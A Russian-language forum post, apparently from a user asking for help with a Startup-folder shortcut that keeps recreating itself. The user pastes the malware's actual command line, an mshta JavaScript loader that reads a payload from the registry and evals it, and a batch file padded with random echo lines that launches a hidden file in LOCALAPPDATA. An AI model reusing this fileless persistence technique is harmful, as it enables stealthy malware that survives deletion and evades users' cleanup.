В папке «Автозагрузка» есть ярлык с командной строкой. Я удалил ярлык, и он появился снова через несколько секунд. Переименуйте его, и через несколько секунд появится новый.
C:\Windows\System32\cmd.exe /C start "" mshta.exe "javascript:P4jMDuRB="Sm3jr6aQ";c40B=new ActiveXObject("WScript.Shell");QS2K8wl="cDy";nv5R4S=c40B.RegRead("HKCU\\software\\voxpbs\\semhdvkm");g2McQ8A="Ns6iJl";eval(nv5R4S);JldeI3="1UbkKa";"
Я также нашел командный файл в моей папке users\me\local. Команды, которые он запускает:
echo J9pmT5Q
echo B0NWNWENzjH21WwgEa2kO0
echo 5Wjb2iki6K0a
echo FrG1NkCWmPPz57pvX
echo vxh8uiEY4zed9rLWqlq3INKnP
echo ZJ882016HVGsX28HEC53bkelC
echo x4SZRj8VY37HCvczeQ9
start "QevslvDchtWcI59vUY1" "%LOCALAPPDATA%\9d9b\505f.3f751"
echo rDqX4A1lWPV1YBTn47sCq
echo US6k8ZpwRaBaZ8WjjuIWQoHhqnYhPf3U
echo VHu5IVd8Y0oGQx0qB0UJaQhjf
echo Q98kbBFD2PgR
echo uEyyzwkL88oeKhG1d3U3ds
echo lpM0oIMjeZ2IA5w9GGWaXzhx3PGmfoO
echo YJrUdLTH
Я вижу, что это происходит при загрузке компьютера. Он называется по ярлыку "d178". Я вижу командное окно на короткое время во время процесса загрузки. Я отсканировал файл "505f.3f751", пока он не заразился.
Если у кого-то есть идеи о том, что это такое, это было бы круто. Я еще не пробовал загрузиться в безопасном режиме, чтобы посмотреть, что будет потом. Я, вероятно, скоро буду.